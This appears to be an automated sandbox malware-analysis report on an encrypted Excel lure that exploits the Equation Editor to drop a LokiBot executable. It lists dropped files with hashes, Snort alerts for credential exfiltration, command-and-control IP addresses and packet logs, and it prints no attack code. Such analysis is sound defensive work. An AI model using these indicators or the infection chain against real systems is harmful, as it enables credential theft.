                SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                Malicious:false
                Reputation:low
                Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD4CBEFC.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):111378
                Entropy (8bit):7.963743447431302
                Encrypted:false
                SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                MD5:5ACDB72AF63832D23CED937B6B976471
                SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                C:\Users\user\AppData\Local\Temp\Cab75DC.tmp
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                C:\Users\user\AppData\Local\Temp\Tar75DD.tmp
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:data
                Category:dropped
                Size (bytes):152788
                Entropy (8bit):6.316654432555028
                Encrypted:false
                SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                MD5:64FEDADE4387A8B92C120B21EC61E394
                SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                Malicious:false
                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                Process:C:\Users\Public\vbc.exe
                File Type:data
                Category:dropped
                Size (bytes):46
                Entropy (8bit):1.0424600748477153
                Encrypted:false
                SSDEEP:3:/lbWwWl:sZ
                MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                Malicious:false
                Preview: ........................................user.
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\132SWST2.txt
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:ASCII text
                Category:downloaded
                Size (bytes):109
                Entropy (8bit):4.249081127682951
                Encrypted:false
                SSDEEP:3:GmM/U04EDzcpGGXUTUWQPC+KvjNf5jXcW6HOjSjXv:XM/UdEDwwGXUYXP6jfrnQOj2v
                MD5:9E9CCD2E7A37630AF52D8B1889355BDA
                SHA1:67D65974597F7AE414EF74B0D8B913F5071EF0F6
                SHA-256:768E6CE61429EBFD9DE25B66E85AA8BBB9E55B898B04E2581C72EF0941FFB604
                SHA-512:B960216C9A88615A7C7051441A7D5A799FB35E404539D49131E40580B959523C877E059DD9ADB2F239B665C67BA077DAE8B75E295867A35F1BE37866204B84F1
                Malicious:false
                IE Cache URL:cutt.ly/
                Preview: __cfduid.d87db188c203ff618989dc45e3896bc351613455365.cutt.ly/.9728.1351479424.30874556.2930565278.30868597.*.
                C:\Users\user\Desktop\~$MV FORTUNE TRADER.xlsx
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:false
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                C:\Users\Public\vbc.exe
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:modified
                Size (bytes):269312
                Entropy (8bit):6.728521643538962
                Encrypted:false
                SSDEEP:6144:T1wUIRkrbJzmFuERDOm+dwclg+8Iy+8Cl9Tf6BxUemJ:T1ORkr1CFuERD9+yb+R8k9TS79mJ
                MD5:2559B5B8D60DD663DF52D0570F5973A9
                SHA1:2AF0E521C34CF7EAAE8677E593900024FE0D16C9
                SHA-256:77EFE5A35F94F065B20860F7E446432D9C61FD6B139B1F4CD360A5A728F49410
                SHA-512:EAFD4ADD02278EE7C827A8EE21827D47ADCAFCA0D29F1CFAC2DE5DC6DDD734BA4C3B74A50DA6C977AF84DEC72498EE4642DA6328459AC659CA84C8CD5F69E669
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 36%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.f...5...5...5.HP5...5.HA5...5.HF5...5..5...5...5...5.HO5...5.HW5...5.HQ5...5.HT5...5Rich...5........................PE..L....A.]............................@0............@.................................m0.............................. ...b...`}..<........v...........................................................................................................text...q........................... ..`.rdata..............................@..@.data....t.......(...|..............@....rsrc....v.......x..................@..@........................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:CDFV2 Encrypted
                Entropy (8bit):7.996808233126403
                TrID:
                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                File name:MV FORTUNE TRADER.xlsx
                File size:2551296
                MD5:b9d2e20a706f5dccd80cbfca09685732
                SHA1:b3d2b8eaa620398c83ff203c3c705d03dad55288
                SHA256:132f5ce3c879259992351ae90865928ed508f5a76ab3f97ce6cd624ecccb551d
                SHA512:4c03476532bf33d64c42c9d2758ec1b55812869881586d83bd76b7f0887c2333cf0e71867fbe87cedaa6d985cc448612ce4e3df0a2a8dad177f5afe94faae66a
                SSDEEP:49152:U86IUlgkJPS53DdEjy8pZ9yrxkhhLIz1Q/1GxtK2qDW0Gq7FrdiiTRWuDchrj:510PSvGyIZUr6hxK1QMG2oW0rBicUB
                File Content Preview:........................>...................'...........................................................................................~...............z.......|.......~...............z.......|.......~...............z.......|..............................

                File Icon

                Icon Hash:e4e2aa8aa4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "MV FORTUNE TRADER.xlsx"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:False

                Streams

                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                General
                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                File Type:data
                Stream Size:64
                Entropy:2.73637206947
                Base64 Encoded:False
                Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                General
                Stream Path:\x6DataSpaces/DataSpaceMap
                File Type:data
                Stream Size:112
                Entropy:2.7597816111
                Base64 Encoded:False
                Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                General
                Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                File Type:data
                Stream Size:200
                Entropy:3.13335930328
                Base64 Encoded:False
                Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                General
                Stream Path:\x6DataSpaces/Version
                File Type:data
                Stream Size:76
                Entropy:2.79079600998
                Base64 Encoded:False
                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                Stream Path: EncryptedPackage, File Type: data, Stream Size: 2527480
                General
                Stream Path:EncryptedPackage
                File Type:data
                Stream Size:2527480
                Entropy:7.99992623739
                Base64 Encoded:True
                Data ASCII:. . & . . . . . . ~ . . q g . . ' . . 7 . . . . . . . ! . . . 4 . . Y E . . . . 9 [ z _ . U . . . B . . . . 3 . . a . : . . . . h . . . ~ " . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . .
                Data Raw:e3 90 26 00 00 00 00 00 ab 7e 8b c3 71 67 c2 1d 27 fc e0 37 99 fd fa 1e 01 cf 04 21 2e 11 c0 34 ca b9 59 45 bc e4 11 1a 39 5b 7a 5f 84 55 fe f9 fb 42 9f 01 8a 2e 33 ad 94 61 ad 3a d8 a2 cc 0f 68 e5 c2 d2 7e 22 19 14 37 21 9b fe 8e 92 ff c7 85 94 83 af 10 1c 1a 09 37 21 9b fe 8e 92 ff c7 85 94 83 af 10 1c 1a 09 37 21 9b fe 8e 92 ff c7 85 94 83 af 10 1c 1a 09 37 21 9b fe 8e 92 ff c7
                Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                General
                Stream Path:EncryptionInfo
                File Type:data
                Stream Size:224
                Entropy:4.55378508921
                Base64 Encoded:False
                Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . V v . Y A . _ . l . 8 . . . ] . Q . . . . . % . > . . z / . . . . . . . l . . . . . . ' . . . E . . . J m . . . R . . b . . ? . . . .
                Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                02/16/21-07:02:51.005730TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916880192.168.2.22185.208.180.121
                02/16/21-07:02:51.005730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916880192.168.2.22185.208.180.121
                02/16/21-07:02:51.005730TCP2025381ET TROJAN LokiBot Checkin4916880192.168.2.22185.208.180.121
                02/16/21-07:02:51.005730TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916880192.168.2.22185.208.180.121

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Feb 16, 2021 07:02:44.529942036 CET49165443192.168.2.22172.67.8.238
                Feb 16, 2021 07:02:44.583849907 CET44349165172.67.8.238192.168.2.22
                Feb 16, 2021 07:02:44.583988905 CET49165443192.168.2.22172.67.8.238
                Feb 16, 2021 07:02:44.598814964 CET49165443192.168.2.22172.67.8.238
                Feb 16, 2021 07:02:44.652445078 CET44349165172.67.8.238192.168.2.22
                Feb 16, 2021 07:02:44.655513048 CET44349165172.67.8.238192.168.2.22
                Feb 16, 2021 07:02:44.655586958 CET44349165172.67.8.238192.168.2.22
                Feb 16, 2021 07:02:44.655622959 CET44349165172.67.8.238192.168.2.22
                Feb 16, 2021 07:02:44.655729055 CET49165443192.168.2.22172.67.8.238
                Feb 16, 2021 07:02:44.655764103 CET49165443192.168.2.22172.67.8.238
                Feb 16, 2021 07:02:44.655770063 CET49165443192.168.2.22172.67.8.238
                Feb 16, 2021 07:02:44.674331903 CET49165443192.168.2.22172.67.8.238
                Feb 16, 2021 07:02:44.725692034 CET44349165172.67.8.238192.168.2.22
                Feb 16, 2021 07:02:44.725754023 CET44349165172.67.8.238192.168.2.22
                Feb 16, 2021 07:02:44.725884914 CET49165443192.168.2.22172.67.8.238
                Feb 16, 2021 07:02:45.944720984 CET49165443192.168.2.22172.67.8.238
                Feb 16, 2021 07:02:45.997760057 CET44349165172.67.8.238192.168.2.22
                Feb 16, 2021 07:02:46.129453897 CET44349165172.67.8.238192.168.2.22
                Feb 16, 2021 07:02:46.129514933 CET44349165172.67.8.238192.168.2.22
                Feb 16, 2021 07:02:46.129683971 CET49165443192.168.2.22172.67.8.238
                Feb 16, 2021 07:02:46.237684011 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.459585905 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.459723949 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.460187912 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.682566881 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.682643890 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.682668924 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.682698011 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.682719946 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.682761908 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.682775974 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.682812929 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.906913042 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.906970978 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.907004118 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.907010078 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.907036066 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.907052994 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.907059908 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.907109976 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.907182932 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.907222986 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.907232046 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.907260895 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.907275915 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.907299995 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:46.907318115 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:46.907351971 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.128703117 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.128797054 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.128814936 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.128860950 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.128907919 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.128930092 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.128952026 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.128979921 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.129039049 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.129070044 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.129111052 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.129133940 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.129163980 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.129260063 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.129322052 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.129422903 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.129472017 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.129489899 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.129533052 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.129543066 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.129602909 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.129694939 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.129760027 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.129790068 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.129877090 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.129913092 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.129980087 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.130073071 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.130115986 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.130135059 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.130178928 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.130836964 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.350758076 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.350816965 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.350857019 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.350898981 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.350948095 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.350991964 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.351028919 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.351043940 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.351068974 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.351069927 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.351074934 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.351093054 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.351102114 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.351144075 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.351149082 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.351165056 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.351191998 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.351226091 CET4916780192.168.2.22103.141.138.123
                Feb 16, 2021 07:02:47.351228952 CET8049167103.141.138.123192.168.2.22
                Feb 16, 2021 07:02:47.351247072 CET4916780192.168.2.22103.141.138.123

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Feb 16, 2021 07:02:44.463685989 CET5219753192.168.2.228.8.8.8
                Feb 16, 2021 07:02:44.512727976 CET53521978.8.8.8192.168.2.22
                Feb 16, 2021 07:02:45.061305046 CET5309953192.168.2.228.8.8.8
                Feb 16, 2021 07:02:45.124488115 CET53530998.8.8.8192.168.2.22
                Feb 16, 2021 07:02:45.124819994 CET5309953192.168.2.228.8.8.8
                Feb 16, 2021 07:02:45.185965061 CET53530998.8.8.8192.168.2.22
                Feb 16, 2021 07:02:45.203356981 CET5283853192.168.2.228.8.8.8
                Feb 16, 2021 07:02:45.260385036 CET53528388.8.8.8192.168.2.22
                Feb 16, 2021 07:02:45.260708094 CET5283853192.168.2.228.8.8.8
                Feb 16, 2021 07:02:45.309402943 CET53528388.8.8.8192.168.2.22
                Feb 16, 2021 07:02:46.157924891 CET6120053192.168.2.228.8.8.8
                Feb 16, 2021 07:02:46.235662937 CET53612008.8.8.8192.168.2.22
                Feb 16, 2021 07:02:50.794610023 CET4954853192.168.2.228.8.8.8
                Feb 16, 2021 07:02:50.857706070 CET53495488.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Feb 16, 2021 07:02:44.463685989 CET192.168.2.228.8.8.80xf63aStandard query (0)cutt.lyA (IP address)IN (0x0001)
